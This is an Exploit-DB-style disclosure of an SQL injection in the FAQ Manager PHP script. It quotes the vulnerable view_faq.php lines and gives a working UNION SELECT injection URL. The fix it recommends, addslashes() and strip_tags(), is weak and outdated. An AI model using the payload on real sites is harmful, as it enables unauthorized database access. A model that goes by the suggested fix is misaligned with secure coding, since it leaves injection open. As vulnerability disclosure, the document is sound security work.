Exploit Title: friendsinwar FAQ Manager SQL Injection (URL) Vulnerability

vendor:

The FAQ Manager

by:

unsuprise

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: The FAQ Manager

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7, Xampp

2012

Exploit Title: friendsinwar FAQ Manager SQL Injection (URL) Vulnerability

The vulnerability exists due to insufficient validation of user-supplied input in 'view_faq.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. Successful exploitation of this vulnerability may allow an attacker to gain access to sensitive information stored in the database.

Mitigation:

Validate user-supplied input using addslashes(), strip_tags(), or other optimization code.

Source

Exploit-DB raw data:

# Exploit Title: friendsinwar FAQ Manager SQL Injection (URL) Vulnerability
# Date: 16.11 2012
# Exploit Author: unsuprise
# Vendor Homepage: http://www.friendsinwar.com
# Software Link:http://www.friendsinwar.com/script_demo/the_faq_manager/
# Tested on: Windows 7, Xampp
# Blog : unsuprise.org

Bug :
view_faq.php

line 3
$question = $_GET['question'];

line 5
$result = mysql_query("SELECT * FROM ".$prefix."faqs WHERE id = ".$question." ORDER BY id");

SQL Injection :
http://localhost/[path]/view_faq.php?question=-4+AND+1=2+UNION+SELECT+0,1,2,version%28%29,4,5--

Solving:
Validate $question (used addslashes() , strip_tags(), or your optimization code)
Validate $result , if data still exist or not..


Thanks to :
d3b4g,All indonesia Security.